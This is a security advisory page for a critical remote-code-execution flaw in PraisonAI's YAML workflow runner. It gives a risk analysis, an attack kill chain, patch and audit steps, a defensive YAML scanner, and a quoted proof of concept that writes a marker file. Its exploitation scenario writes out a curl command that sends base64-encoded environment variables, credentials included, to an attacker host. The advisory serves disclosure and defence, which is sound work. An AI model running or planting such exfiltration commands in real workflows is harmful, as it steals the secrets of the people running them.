GHSA-vc46-vw85-3wvm: PraisonAI: RCE via malicious workflow YAML execution

GHSA-vc46-vw85-3wvm CRITICAL
Published April 10, 2026
CISO Take

PraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.

Sources: GitHub Advisory, ATLAS, NVD

What is the risk?

CRITICAL. CVSS 9.8 with AV:N/AC:L/PR:N/UI:N reflects the full blast radius: any environment running PraisonAI workflows against externally-sourced YAML is fully exploitable without restriction. In CI/CD contexts — the primary use case for AI agent orchestration — this becomes a direct supply chain attack vector with near-zero exploitation barrier. The 41 prior CVEs in the same package indicate a systemic security debt warranting elevated scrutiny beyond this single vulnerability. No CISA KEV listing yet, but the trivial exploit primitive and widespread CI usage make active exploitation a near-term certainty.

Attack Kill Chain

1. Artifact Delivery (AML.T0011.000 Unsafe AI Artifacts)
   Adversary crafts a malicious YAML workflow file with `run:`, `script:`, or `python:` directives and delivers it via shared repository, CI/CD pipeline PR, or social engineering.

2. User Execution (AML.T0011 User Execution)
   Victim or automated CI job executes `praisonai workflow run <malicious.yaml>`, triggering the JobWorkflowExecutor to parse and process the untrusted YAML without validation.

3. Command Execution (AML.T0050 Command and Scripting Interpreter)
   PraisonAI passes `run:` values directly to subprocess.run() or evaluates `script:`/`python:` content via exec(), achieving arbitrary OS and Python code execution on the host.

4. Host Compromise (AML.T0072 Reverse Shell)
   Attacker achieves full system compromise: exfiltrates AI API keys and cloud credentials from environment variables, establishes persistence, and moves laterally to connected AI infrastructure.

What systems are affected?

Package          Ecosystem  Vulnerable Range  Patched  Dependents  Share patched  Time to patch
PraisonAI        pip        <= 4.5.138        4.5.139  1           84%            ~0d
praisonaiagents  pip        <= 1.5.139        1.5.140  11          86%            ~0d

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV: Network
AC: Low
PR: None
UI: None
S: Unchanged
C: High
I: High
A: High

What should I do?

1. IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140.
2. AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries.
3. RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits.
4. SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks.
5. DETECT: Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes.
6. ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.
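The AUDIT step above as an added example (not PraisonAI's own code): a scanner that parses a workflow with `yaml.safe_load` and flags every `type: job` step carrying a `run:`, `script:` or `python:` key, the three directives the advisory names. The `nightly-report` sample workflow and the function names are constructed for this illustration.

```python
try:
    import yaml  # PyYAML, needed only by scan_file()
except ImportError:
    yaml = None

# Step keys the advisory lists as reaching a shell or the Python interpreter.
EXEC_KEYS = ("run", "script", "python")

def find_exec_steps(workflow):
    """Return (step_index, step_name, key, payload) for every host-executing
    directive in a parsed workflow document."""
    # Only `type: job` documents are routed to JobWorkflowExecutor.
    if not isinstance(workflow, dict) or workflow.get("type") != "job":
        return []
    findings = []
    for idx, step in enumerate(workflow.get("steps") or []):
        if not isinstance(step, dict):
            continue  # skip malformed entries rather than crash the audit
        for key in EXEC_KEYS:
            if key in step:
                findings.append((idx, str(step.get("name", "")), key,
                                 str(step[key]).strip()))
    return findings

def scan_file(path):
    """Parse with yaml.safe_load (never yaml.load) and audit the document."""
    if yaml is None:
        raise RuntimeError("PyYAML is required for scan_file()")
    with open(path, encoding="utf-8") as fh:
        return find_exec_steps(yaml.safe_load(fh))

# Constructed sample: the dict yaml.safe_load returns for a job workflow
# whose second step shells out and whose third runs inline Python.
SAMPLE_WORKFLOW = {
    "type": "job",
    "name": "nightly-report",
    "steps": [
        {"name": "summarise", "agent": "analyst", "task": "summarise results"},
        {"name": "write-file", "run": "python -c \"open('out.txt','w').write('x')\""},
        {"name": "inline", "script": "print('hello from exec')"},
    ],
}

if __name__ == "__main__":  # CI gate: non-zero exit if any finding
    hits = find_exec_steps(SAMPLE_WORKFLOW)
    for idx, name, key, payload in hits:
        print(f"step {idx} ({name}): {key}: {payload}")
    raise SystemExit(1 if hits else 0)
```

Wire `scan_file` over every workflow YAML in a repository as a pre-merge check so a PR that introduces one of these directives fails before any CI job can run it.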

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk Management System
ISO 42001
A.6.1.4 - AI system supply chain security
NIST AI RMF
GOVERN 1.7 - Processes and policies for AI risk management
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

Is GHSA-vc46-vw85-3wvm actively exploited?

No confirmed active exploitation of GHSA-vc46-vw85-3wvm has been reported, but organizations should still patch proactively.

What systems are affected by GHSA-vc46-vw85-3wvm?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, CI/CD pipelines, multi-agent orchestration, training pipelines.

What is the CVSS score for GHSA-vc46-vw85-3wvm?

GHSA-vc46-vw85-3wvm has a CVSS v3.1 base score of 9.8 (CRITICAL).

AI Security Impact

Affected AI Architectures

agent frameworks, CI/CD pipelines, multi-agent orchestration, training pipelines

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0011 User Execution
AML.T0011.000 Unsafe AI Artifacts
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.6.1.4
NIST AI RMF: GOVERN 1.7
OWASP LLM Top 10: LLM07

Technical Details

Original Advisory

`praisonai workflow run <file.yaml>` loads untrusted YAML and, if `type: job`, executes steps through `JobWorkflowExecutor` in job_workflow.py. This supports:

- `run:` → shell command execution via `subprocess.run()`
- `script:` → inline Python execution via `exec()`
- `python:` → arbitrary Python script execution

A malicious YAML file can execute arbitrary host commands.

### Affected Code

- workflow.py → `action_run()`
- job_workflow.py → `_exec_shell()`, `_exec_inline_python()`, `_exec_python_script()`

### PoC

Create `exploit.yaml`:

```yaml
type: job
name: exploit
steps:
  - name: write-file
    run: python -c "open('pwned.txt','w').write('owned')"
```

Run:

```bash
praisonai workflow run exploit.yaml
```

### Reproduction Steps

1. Save the YAML above as `exploit.yaml`.
2. Execute `praisonai workflow run exploit.yaml`.
3. Confirm `pwned.txt` appears in the working directory.

### Impact

Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts.

**Reporter:** Lakshmikanthan K (letchupkt)

Exploitation Scenario

An adversary targeting an organization's AI development pipeline uploads a malicious `automation.yaml` to a shared workflow repository or submits it via a GitHub PR to a CI/CD job. The file contains a `type: job` step with `run: curl attacker.com/exfil -d "$(env | base64)"`, which silently exfiltrates all environment variables — including OpenAI API keys, AWS credentials, and database connection strings — the moment any developer or automated job runs `praisonai workflow run automation.yaml`. With zero prerequisites, no authentication, and no special knowledge required, the attacker achieves full host compromise. In multi-agent deployments where PraisonAI orchestrates downstream AI tools, the blast radius extends to all connected systems and their credentials.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 10, 2026
Last Modified
April 10, 2026
First Seen
April 10, 2026
